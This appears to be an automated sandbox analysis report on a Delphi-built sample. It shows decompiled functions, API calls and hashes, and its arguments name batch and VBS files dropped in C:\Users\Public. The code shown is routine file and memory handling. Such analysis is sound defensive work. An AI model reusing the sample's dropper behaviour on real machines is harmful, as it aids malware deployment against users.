                                                                                                            • Instruction Fuzzy Hash: 5EE0B676D00118ABCB109AE9DC088DFBB7DEF45221B000662B915F2110DB715A109AA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 01140000, Relevance: 1.5, APIs: 1, Instructions: 25threadCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • RtlExitUserThread.NTDLL(00000000), ref: 01140023
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.760173312.0000000001140000.00000040.00000001.sdmp, Offset: 01140000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: ExitThreadUser
                                                                                                            • String ID:
                                                                                                            • API String ID: 3424019298-0
                                                                                                            • Opcode ID: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction ID: 31f55fc70ad1d22fff56d4cf632896c20d063e432f342e22e3eed41fb45fc377
                                                                                                            • Opcode Fuzzy Hash: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction Fuzzy Hash: 5EE0B676D00118ABCB109AE9DC088DFBB7DEF45221B000662B915F2110DB715A109AA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 05F50000, Relevance: 1.5, APIs: 1, Instructions: 25threadCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • RtlExitUserThread.NTDLL(00000000), ref: 05F50023
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.762569897.0000000005F50000.00000040.00000001.sdmp, Offset: 05F50000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: ExitThreadUser
                                                                                                            • String ID:
                                                                                                            • API String ID: 3424019298-0
                                                                                                            • Opcode ID: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction ID: 31f55fc70ad1d22fff56d4cf632896c20d063e432f342e22e3eed41fb45fc377
                                                                                                            • Opcode Fuzzy Hash: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction Fuzzy Hash: 5EE0B676D00118ABCB109AE9DC088DFBB7DEF45221B000662B915F2110DB715A109AA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 06630000, Relevance: 1.5, APIs: 1, Instructions: 25threadCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • RtlExitUserThread.NTDLL(00000000), ref: 06630023
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.763229591.0000000006630000.00000040.00000001.sdmp, Offset: 06630000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: ExitThreadUser
                                                                                                            • String ID:
                                                                                                            • API String ID: 3424019298-0
                                                                                                            • Opcode ID: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction ID: 31f55fc70ad1d22fff56d4cf632896c20d063e432f342e22e3eed41fb45fc377
                                                                                                            • Opcode Fuzzy Hash: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction Fuzzy Hash: 5EE0B676D00118ABCB109AE9DC088DFBB7DEF45221B000662B915F2110DB715A109AA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 004A0000, Relevance: 1.5, APIs: 1, Instructions: 25threadCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • RtlExitUserThread.NTDLL(00000000), ref: 004A0023
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.759505243.00000000004A0000.00000040.00000001.sdmp, Offset: 004A0000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: ExitThreadUser
                                                                                                            • String ID:
                                                                                                            • API String ID: 3424019298-0
                                                                                                            • Opcode ID: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction ID: 31f55fc70ad1d22fff56d4cf632896c20d063e432f342e22e3eed41fb45fc377
                                                                                                            • Opcode Fuzzy Hash: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction Fuzzy Hash: 5EE0B676D00118ABCB109AE9DC088DFBB7DEF45221B000662B915F2110DB715A109AA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 50487730, Relevance: 1.5, APIs: 1, Instructions: 23fileCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 75%
                                                                                                            			E50487730(void* __eax, long __ecx, void* __edx) {
				long _v16;
				int _t4;

				_push(__ecx);
				_t4 = WriteFile(__eax, __edx, __ecx,  &_v16, 0); // executed
				if(_t4 == 0) {
					_v16 = 0xffffffff;
				}
				return _v16;
			}





                                                                                                            0x50487733
                                                                                                            0x50487744
                                                                                                            0x5048774b
                                                                                                            0x5048774d
                                                                                                            0x5048774d
                                                                                                            0x5048775b

                                                                                                            APIs
                                                                                                            • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 50487744
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.768259612.0000000050480000.00000040.00000001.sdmp, Offset: 50480000, based on PE: true
                                                                                                            Similarity
                                                                                                            • API ID: FileWrite
                                                                                                            • String ID:
                                                                                                            • API String ID: 3934441357-0
                                                                                                            • Opcode ID: 0f6d7d8487fcfeb5765049f19164c4ca1b30df6842dcbc549f0d081ddac3b416
                                                                                                            • Instruction ID: 09aeed9e903ea7174d26be7b269ae0d2a0810b6c1a50db7a768014d8dbe4f4ae
                                                                                                            • Opcode Fuzzy Hash: 0f6d7d8487fcfeb5765049f19164c4ca1b30df6842dcbc549f0d081ddac3b416
                                                                                                            • Instruction Fuzzy Hash: 43D05B763091507AD314965A5D84DE75BDCDFC5771F10073EB668C3181D724CC05C271
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 037F0000, Relevance: 1.5, APIs: 1, Instructions: 16libraryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • LoadLibraryA.KERNELBASE(?), ref: 037F001D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.761137099.00000000037F0000.00000040.00000001.sdmp, Offset: 037F0000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: LibraryLoad
                                                                                                            • String ID:
                                                                                                            • API String ID: 1029625771-0
                                                                                                            • Opcode ID: aa8963ae1cd73f7bd24b0d0180e87021e78b3d589d0fcefb7e39085448f0c57e
                                                                                                            • Instruction ID: aba7923e56dd8b75a9ecdfe9d96d04ae556ff6b291c609bea8f56a760c82f53f
                                                                                                            • Opcode Fuzzy Hash: aa8963ae1cd73f7bd24b0d0180e87021e78b3d589d0fcefb7e39085448f0c57e
                                                                                                            • Instruction Fuzzy Hash: AAE09A74D00608EFCB04CF99C84888DBBB5AF48320B20C291E825973A5D7309E419A40
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 051E0000, Relevance: 1.5, APIs: 1, Instructions: 16libraryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • LoadLibraryA.KERNELBASE(?), ref: 051E001D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.761259343.00000000051E0000.00000040.00000001.sdmp, Offset: 051E0000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: LibraryLoad
                                                                                                            • String ID:
                                                                                                            • API String ID: 1029625771-0
                                                                                                            • Opcode ID: aa8963ae1cd73f7bd24b0d0180e87021e78b3d589d0fcefb7e39085448f0c57e
                                                                                                            • Instruction ID: 0a1323294710a55100409d9cd91b51ec3bfc65983a9f8872fd681c694bb836e0
                                                                                                            • Opcode Fuzzy Hash: aa8963ae1cd73f7bd24b0d0180e87021e78b3d589d0fcefb7e39085448f0c57e
                                                                                                            • Instruction Fuzzy Hash: 1EE00274D04608EFCB14DF99C98889DBBB5AF89320B25C295E865A73A5D730AE419A80
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 5048779C, Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E5048779C(void* __eax) {
				signed char _t5;

				_t5 = GetFileAttributesA(E50484714(__eax)); // executed
				if(_t5 == 0xffffffff || (_t5 & 0x00000010) == 0) {
					return 0;
				} else {
					return 1;
				}
			}




                                                                                                            0x504877a7
                                                                                                            0x504877af
                                                                                                            0x504877b8
                                                                                                            0x504877b9
                                                                                                            0x504877bc
                                                                                                            0x504877bc

                                                                                                            APIs
                                                                                                            • GetFileAttributesA.KERNEL32(00000000,?,50493070,cvb.vbs,C:\Users\Public\,hcc.bat,C:\Users\Public\,Rer.bat,C:\Users\Public\,tso.bat,C:\Users\Public\,.bat,C:\Users\Public\,AppData\Local,504936F4,?), ref: 504877A7
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.768259612.0000000050480000.00000040.00000001.sdmp, Offset: 50480000, based on PE: true
                                                                                                            Similarity
                                                                                                            • API ID: AttributesFile
                                                                                                            • String ID:
                                                                                                            • API String ID: 3188754299-0
                                                                                                            • Opcode ID: d98fc3a17eb02cc8cb761c6721e766e5d4c71d98013676cdf50f848e71397638
                                                                                                            • Instruction ID: 6437740ad9eeb57610cc0a88dc0b5d2d195b62f37b8add9cb60737fc7e7db10c
                                                                                                            • Opcode Fuzzy Hash: d98fc3a17eb02cc8cb761c6721e766e5d4c71d98013676cdf50f848e71397638
                                                                                                            • Instruction Fuzzy Hash: 78C08CA06022004A5E8091FC1DC114A02C80D650383201F26F47AE23C3E22DE8222070
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 504876D8, Relevance: 1.5, APIs: 1, Instructions: 14fileCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E504876D8(void* __eax) {
				void* _t4;

				_t4 = CreateFileA(E50484714(__eax), 0xc0000000, 0, 0, 2, 0x80, 0); // executed
				return _t4;
			}




                                                                                                            0x504876f5
                                                                                                            0x504876fb

                                                                                                            APIs
                                                                                                            • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,5048FF4C,50487701,50491FE4,00000000,504920C1,?,?,5048FF4C,00000001), ref: 504876F5
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.768259612.0000000050480000.00000040.00000001.sdmp, Offset: 50480000, based on PE: true
                                                                                                            Similarity
                                                                                                            • API ID: CreateFile
                                                                                                            • String ID:
                                                                                                            • API String ID: 823142352-0
                                                                                                            • Opcode ID: 6ba71d939df84bb8b65ce461c4a7faf48eb8248ea897c00855a26e3c53ecf05e
                                                                                                            • Instruction ID: f4c119bc40926c142dc6ba78393d1c8811ebe547b954b55ffaf2aa8c61a20cdd
                                                                                                            • Opcode Fuzzy Hash: 6ba71d939df84bb8b65ce461c4a7faf48eb8248ea897c00855a26e3c53ecf05e
                                                                                                            • Instruction Fuzzy Hash: D8C092A03C230072FA7011F40CC7F1601881BA5F0DFB08A2AB741FE1C2C9D9A84401AC
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 504877C0, Relevance: 1.5, APIs: 1, Instructions: 11fileCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 58%
                                                                                                            			E504877C0(void* __eax) {
				int _t4;

				_t4 = DeleteFileA(E50484714(__eax)); // executed
				asm("sbb eax, eax");
				return _t4 + 1;
			}




                                                                                                            0x504877cb
                                                                                                            0x504877d3
                                                                                                            0x504877d7

                                                                                                            APIs
                                                                                                            • DeleteFileA.KERNEL32(00000000,?,5049360E,00002710,cvb.vbs,C:\Users\Public\,hcc.bat,C:\Users\Public\,Rer.bat,C:\Users\Public\,tso.bat,C:\Users\Public\,.bat,C:\Users\Public\,AppData\Local,504936F4), ref: 504877CB
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.768259612.0000000050480000.00000040.00000001.sdmp, Offset: 50480000, based on PE: true
                                                                                                            Similarity
                                                                                                            • API ID: DeleteFile
                                                                                                            • String ID:
                                                                                                            • API String ID: 4033686569-0
                                                                                                            • Opcode ID: 9df19f9ad80b542d0a0c999d327dcab7fe2de99885c009ff2145d6091e66941a
                                                                                                            • Instruction ID: f1b4cd535c71d41fc0313908931a78698d414028360e0c499921833766713a97
                                                                                                            • Opcode Fuzzy Hash: 9df19f9ad80b542d0a0c999d327dcab7fe2de99885c009ff2145d6091e66941a
                                                                                                            • Instruction Fuzzy Hash: 0DB012927522404A8B80A5FC0CC190D01CC9D6A00EB204E3BF006D2202D52EC40400A1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 50481738, Relevance: 1.3, APIs: 1, Instructions: 71memoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E50481738(signed int __eax, intOrPtr* __ecx, void* __edx) {
				signed int _v20;
				void* _v24;
				char _v28;
				char _v32;
				char _v36;
				intOrPtr _t20;
				void* _t35;
				intOrPtr* _t39;
				intOrPtr* _t48;
				void** _t49;
				signed int* _t50;
				void** _t51;

				_t51 =  &_v24;
				_t39 = __ecx;
				 *_t51 = __edx;
				_t49 =  &_v32;
				_t48 =  &_v36;
				_t50 =  &_v28;
				_v24 = __eax & 0xfffff000;
				_v20 =  *_t51 + __eax + 0x00000fff & 0xfffff000;
				 *__ecx = _v24;
				 *((intOrPtr*)(__ecx + 4)) = _v20 - _v24;
				_t20 =  *0x504955e4; // 0x81fd24
				 *_t48 = _t20;
				while(0x504955e4 !=  *_t48) {
					_t10 =  *_t48 + 8; // 0x0
					 *_t49 =  *_t10;
					 *_t50 =  *((intOrPtr*)( *_t48 + 0xc)) +  *_t49;
					if( *_t49 < _v24) {
						 *_t49 = _v24;
					}
					if( *_t50 > _v20) {
						 *_t50 = _v20;
					}
					if( *_t49 <  *_t50) {
						_t35 = VirtualAlloc( *_t49,  *_t50 -  *_t49, 0x1000, 4); // executed
						if(_t35 == 0) {
							 *_t39 = 0;
							return 0;
						}
					}
					 *_t48 =  *((intOrPtr*)( *_t48));
				}
				return 0x504955e4;
			}















                                                                                                            0x5048173c
                                                                                                            0x5048173f
                                                                                                            0x50481741
                                                                                                            0x50481744
                                                                                                            0x50481748
                                                                                                            0x5048174c
                                                                                                            0x5048175a
                                                                                                            0x5048176d
                                                                                                            0x50481775
                                                                                                            0x5048177f
                                                                                                            0x50481782
                                                                                                            0x50481787
                                                                                                            0x504817e6
                                                                                                            0x5048178d
                                                                                                            0x50481790
                                                                                                            0x50481799
                                                                                                            0x504817a2
                                                                                                            0x504817a8
                                                                                                            0x504817a8
                                                                                                            0x504817b1
                                                                                                            0x504817b7
                                                                                                            0x504817b7
                                                                                                            0x504817bf
                                                                                                            0x504817d1
                                                                                                            0x504817d8
                                                                                                            0x504817dc
                                                                                                            0x00000000
                                                                                                            0x504817dc
                                                                                                            0x504817d8
                                                                                                            0x504817e4
                                                                                                            0x504817e4
                                                                                                            0x504817f6

                                                                                                            APIs
                                                                                                            • VirtualAlloc.KERNEL32(?,?,00001000,00000004), ref: 504817D1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.768259612.0000000050480000.00000040.00000001.sdmp, Offset: 50480000, based on PE: true
                                                                                                            Similarity
                                                                                                            • API ID: AllocVirtual
                                                                                                            • String ID:
                                                                                                            • API String ID: 4275171209-0
                                                                                                            • Opcode ID: 518067cb2437f5449339432c937e32a26c8b52b56a3d25efa7cf8e7d809d8146
                                                                                                            • Instruction ID: 1cb7ff719d62c39abca352134dd945c863521808e1785b328c621e745ac13584
                                                                                                            • Opcode Fuzzy Hash: 518067cb2437f5449339432c937e32a26c8b52b56a3d25efa7cf8e7d809d8146
                                                                                                            • Instruction Fuzzy Hash: 4121CDB4604246DFC750CF68C880A8AB7E5FF88750F248E2AF998CB354D334E9548B52
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 001A0000, Relevance: 1.3, APIs: 1, Instructions: 16sleepCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • Sleep.KERNELBASE(FFFFFFFF), ref: 001A0026
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.759428257.00000000001A0000.00000040.00000001.sdmp, Offset: 001A0000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: Sleep
                                                                                                            • String ID:
                                                                                                            • API String ID: 3472027048-0
                                                                                                            • Opcode ID: aa8963ae1cd73f7bd24b0d0180e87021e78b3d589d0fcefb7e39085448f0c57e
                                                                                                            • Instruction ID: 553a3df21eedca1aeb602dccea521d2df37fb5df98d19013caa2e94284d7467c
                                                                                                            • Opcode Fuzzy Hash: aa8963ae1cd73f7bd24b0d0180e87021e78b3d589d0fcefb7e39085448f0c57e
                                                                                                            • Instruction Fuzzy Hash: C4E00274D04608EFCB04DF99C98889DBBB5AF89320B25C295E965A73A5D730AE419A80
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 50482C88, Relevance: 1.3, APIs: 1, Instructions: 8COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E50482C88(void* __eax, void* __eflags) {
				int _t4;
				void* _t8;

				_t8 = __eflags;
				_t4 = CloseHandle(__eax); // executed
				return _t4 - 0x00000001 & 0xffffff00 | _t8 == 0x00000000;
			}





                                                                                                            0x50482c88
                                                                                                            0x50482c8c
                                                                                                            0x50482c96

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.768259612.0000000050480000.00000040.00000001.sdmp, Offset: 50480000, based on PE: true
                                                                                                            Similarity
                                                                                                            • API ID: CloseHandle
                                                                                                            • String ID:
                                                                                                            • API String ID: 2962429428-0
                                                                                                            • Opcode ID: b9a644064acbf8c2f23162556625be10575e122fc1e8cda7c3188c4a00ccf4fa
                                                                                                            • Instruction ID: 0069286461461496348ffbbf091d0efc2b5eca187beccb2dfbab2c6c2e39d8e3
                                                                                                            • Opcode Fuzzy Hash: b9a644064acbf8c2f23162556625be10575e122fc1e8cda7c3188c4a00ccf4fa
                                                                                                            • Instruction Fuzzy Hash: 65A002C222371816990412F51ECA867858CA95C4A579859D77605C1162DA5E4C601060
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Non-executed Functions

                                                                                                            Function 504851E0, Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 144stringlibraryfileCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 53%
                                                                                                            			E504851E0(char* __eax, intOrPtr __edx) {
				char* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char* _v20;
				intOrPtr _v24;
				_Unknown_base(*)()* _v28;
				struct _WIN32_FIND_DATAA _v346;
				char _v607;
				char* _t75;
				char* _t85;
				void* _t108;
				void* _t112;
				struct HINSTANCE__* _t114;
				void* _t115;
				void* _t116;

				_v12 = __edx;
				_v8 = __eax;
				_v16 = _v8;
				_t114 = GetModuleHandleA("kernel32.dll");
				if(_t114 == 0) {
					L4:
					if( *_v8 != 0x5c) {
						_v20 = _v8 + 2;
						goto L10;
					} else {
						if( *((char*)(_v8 + 1)) == 0x5c) {
							_v20 = E504851B4(_v8 + 2);
							if( *_v20 != 0) {
								_v20 = E504851B4(_v20 + 1);
								if( *_v20 != 0) {
									L10:
									_t108 = _v20 - _v8;
									_push(_t108 + 1);
									_push(_v8);
									_push( &_v607);
									L50481240();
									while( *_v20 != 0) {
										_v24 = E504851B4(_v20 + 1);
										_t112 = _v24 - _v20;
										if(_t112 + _t108 + 1 <= 0x105) {
											_push(_t112 + 1);
											_push(_v20);
											_push( &(( &_v607)[_t108]));
											L50481240();
											_t115 = FindFirstFileA( &_v607,  &_v346);
											if(_t115 != 0xffffffff) {
												FindClose(_t115);
												_t75 =  &(_v346.cFileName);
												_push(_t75);
												L50481248();
												if(_t75 + _t108 + 1 + 1 <= 0x105) {
													 *((char*)(_t116 + _t108 - 0x25b)) = 0x5c;
													_push(0x105 - _t108 - 1);
													_push( &(_v346.cFileName));
													_push( &(( &(( &_v607)[_t108]))[1]));
													L50481240();
													_t85 =  &(_v346.cFileName);
													_push(_t85);
													L50481248();
													_t108 = _t108 + _t85 + 1;
													_v20 = _v24;
													continue;
												}
											}
										}
										goto L17;
									}
									_push(_v12);
									_push( &_v607);
									_push(_v8);
									L50481240();
								}
							}
						}
					}
				} else {
					_v28 = GetProcAddress(_t114, "GetLongPathNameA");
					if(_v28 == 0) {
						goto L4;
					} else {
						_push(0x105);
						_push( &_v607);
						_push(_v8);
						if(_v28() == 0) {
							goto L4;
						} else {
							_push(_v12);
							_push( &_v607);
							_push(_v8);
							L50481240();
						}
					}
				}
				L17:
				return _v16;
			}


















                                                                                                            0x504851ec
                                                                                                            0x504851ef
                                                                                                            0x504851f5
                                                                                                            0x50485202
                                                                                                            0x50485206
                                                                                                            0x5048524c
                                                                                                            0x50485252
                                                                                                            0x5048529b
                                                                                                            0x00000000
                                                                                                            0x50485254
                                                                                                            0x5048525b
                                                                                                            0x5048526c
                                                                                                            0x50485275
                                                                                                            0x50485284
                                                                                                            0x5048528d
                                                                                                            0x5048529e
                                                                                                            0x504852a1
                                                                                                            0x504852a7
                                                                                                            0x504852ab
                                                                                                            0x504852b2
                                                                                                            0x504852b3
                                                                                                            0x50485368
                                                                                                            0x504852c6
                                                                                                            0x504852cc
                                                                                                            0x504852d9
                                                                                                            0x504852e0
                                                                                                            0x504852e4
                                                                                                            0x504852ed
                                                                                                            0x504852ee
                                                                                                            0x50485306
                                                                                                            0x5048530b
                                                                                                            0x5048530e
                                                                                                            0x50485313
                                                                                                            0x50485319
                                                                                                            0x5048531a
                                                                                                            0x5048532a
                                                                                                            0x5048532c
                                                                                                            0x5048533c
                                                                                                            0x50485343
                                                                                                            0x5048534d
                                                                                                            0x5048534e
                                                                                                            0x50485353
                                                                                                            0x50485359
                                                                                                            0x5048535a
                                                                                                            0x50485360
                                                                                                            0x50485365
                                                                                                            0x00000000
                                                                                                            0x50485365
                                                                                                            0x5048532a
                                                                                                            0x5048530b
                                                                                                            0x00000000
                                                                                                            0x504852d9
                                                                                                            0x50485377
                                                                                                            0x5048537e
                                                                                                            0x50485382
                                                                                                            0x50485383
                                                                                                            0x50485383
                                                                                                            0x5048528d
                                                                                                            0x50485275
                                                                                                            0x5048525b
                                                                                                            0x50485208
                                                                                                            0x50485213
                                                                                                            0x5048521a
                                                                                                            0x00000000
                                                                                                            0x5048521c
                                                                                                            0x5048521c
                                                                                                            0x50485227
                                                                                                            0x5048522b
                                                                                                            0x50485231
                                                                                                            0x00000000
                                                                                                            0x50485233
                                                                                                            0x50485236
                                                                                                            0x5048523d
                                                                                                            0x50485241
                                                                                                            0x50485242
                                                                                                            0x50485242
                                                                                                            0x50485231
                                                                                                            0x5048521a
                                                                                                            0x50485388
                                                                                                            0x50485391

                                                                                                            APIs
                                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,5048668C,?,504940C4), ref: 504851FD
                                                                                                            • GetProcAddress.KERNEL32(00000000,GetLongPathNameA), ref: 5048520E
                                                                                                            • lstrcpyn.KERNEL32(?,?,?,?,504940C4), ref: 50485242
                                                                                                            • lstrcpyn.KERNEL32(?,?,?,kernel32.dll,5048668C,?,504940C4), ref: 504852B3
                                                                                                            • lstrcpyn.KERNEL32(?,?,?,?,?,?,kernel32.dll,5048668C,?,504940C4), ref: 504852EE
                                                                                                            • FindFirstFileA.KERNEL32(?,?,?,?,?,?,?,?,kernel32.dll,5048668C,?,504940C4), ref: 50485301
                                                                                                            • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,kernel32.dll,5048668C,?,504940C4), ref: 5048530E
                                                                                                            • lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,kernel32.dll,5048668C,?,504940C4), ref: 5048531A
                                                                                                            • lstrcpyn.KERNEL32(?,?,00000104,?,00000000,?,?,?,?,?,?,?,?,kernel32.dll,5048668C), ref: 5048534E
                                                                                                            • lstrlen.KERNEL32(?,?,?,00000104,?,00000000,?,?,?,?,?,?,?,?,kernel32.dll,5048668C), ref: 5048535A
                                                                                                            • lstrcpyn.KERNEL32(?,?,?,?,?,?,00000104,?,00000000,?,?,?,?,?,?,?), ref: 50485383
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.768259612.0000000050480000.00000040.00000001.sdmp, Offset: 50480000, based on PE: true
                                                                                                            Similarity
                                                                                                            • API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
                                                                                                            • String ID: GetLongPathNameA$\$kernel32.dll
                                                                                                            • API String ID: 3245196872-1565342463
                                                                                                            • Opcode ID: b57de8db425a69270089dd1b94e2e6c8acefffff646fab68b0264f94fe33cd72
                                                                                                            • Instruction ID: 2dd190cc96169cd47e3f00f35083c80e39e21809895af14602664653e5ea8938
                                                                                                            • Opcode Fuzzy Hash: b57de8db425a69270089dd1b94e2e6c8acefffff646fab68b0264f94fe33cd72
                                                                                                            • Instruction Fuzzy Hash: 54512871D01299AFDB01CBE8CC85ADEB7BCBF09304F140AA6E515E7250D7789E408BA4
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 50485D8D, Relevance: 9.0, APIs: 6, Instructions: 41threadCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E50485D8D(void* __eax, void* __ebx, void* __ecx, intOrPtr* __edi) {
				long _t11;
				void* _t16;

				_t16 = __ebx;
				 *__edi =  *__edi + __ecx;
				 *((intOrPtr*)(__eax - 0x504955b4)) =  *((intOrPtr*)(__eax - 0x504955b4)) + __eax - 0x504955b4;
				 *0x5049400c = 2;
				 *0x50495014 = 0x50481188;
				 *0x50495018 = 0x50481198;
				 *0x50495046 = 2;
				 *0x50495000 = E50484E84;
				if(E50483558() != 0) {
					_t3 = E50483588();
				}
				E5048364C(_t3);
				 *0x5049504c = 0xd7b0;
				 *0x50495218 = 0xd7b0;
				 *0x504953e4 = 0xd7b0;
				 *0x5049503c = GetCommandLineA();
				 *0x50495038 = E504812C8();
				if((GetVersion() & 0x80000000) == 0x80000000) {
					 *0x504955b8 = E50485CC4(GetThreadLocale(), _t16, __eflags);
				} else {
					if((GetVersion() & 0x000000ff) <= 4) {
						 *0x504955b8 = E50485CC4(GetThreadLocale(), _t16, __eflags);
					} else {
						 *0x504955b8 = 3;
					}
				}
				_t11 = GetCurrentThreadId();
				 *0x50495030 = _t11;
				return _t11;
			}





                                                                                                            0x50485d8d
                                                                                                            0x50485d92
                                                                                                            0x50485d97
                                                                                                            0x50485d99
                                                                                                            0x50485da0
                                                                                                            0x50485daa
                                                                                                            0x50485db4
                                                                                                            0x50485dbb
                                                                                                            0x50485dcc
                                                                                                            0x50485dce
                                                                                                            0x50485dce
                                                                                                            0x50485dd3
                                                                                                            0x50485dd8
                                                                                                            0x50485de1
                                                                                                            0x50485dea
                                                                                                            0x50485df8
                                                                                                            0x50485e02
                                                                                                            0x50485e16
                                                                                                            0x50485e4f
                                                                                                            0x50485e18
                                                                                                            0x50485e26
                                                                                                            0x50485e3e
                                                                                                            0x50485e28
                                                                                                            0x50485e28
                                                                                                            0x50485e28
                                                                                                            0x50485e26
                                                                                                            0x50485e54
                                                                                                            0x50485e59
                                                                                                            0x50485e5e

                                                                                                            APIs
                                                                                                              • Part of subcall function 50483558: GetKeyboardType.USER32(00000000), ref: 5048355D
                                                                                                              • Part of subcall function 50483558: GetKeyboardType.USER32(00000001), ref: 50483569
                                                                                                            • GetCommandLineA.KERNEL32 ref: 50485DF3
                                                                                                            • GetVersion.KERNEL32 ref: 50485E07
                                                                                                            • GetVersion.KERNEL32 ref: 50485E18
                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 50485E54
                                                                                                              • Part of subcall function 50483588: RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 504835AA
                                                                                                              • Part of subcall function 50483588: RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,504835F9,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 504835DD
                                                                                                              • Part of subcall function 50483588: RegCloseKey.ADVAPI32(?,50483600,00000000,?,00000004,00000000,504835F9,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 504835F3
                                                                                                            • GetThreadLocale.KERNEL32 ref: 50485E34
                                                                                                              • Part of subcall function 50485CC4: GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,50485D2A), ref: 50485CEA
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.768259612.0000000050480000.00000040.00000001.sdmp, Offset: 50480000, based on PE: true
                                                                                                            Similarity
                                                                                                            • API ID: KeyboardLocaleThreadTypeVersion$CloseCommandCurrentInfoLineOpenQueryValue
                                                                                                            • String ID:
                                                                                                            • API String ID: 3734044017-0
                                                                                                            • Opcode ID: 1d9956f587c360cdec92ad1d204fd959c553d3ef32f82797025e7e9413b54aef
                                                                                                            • Instruction ID: ff56f05ab8ac3892f708c69e43f5687831d6e48429358b8316af94fc9ea1a553
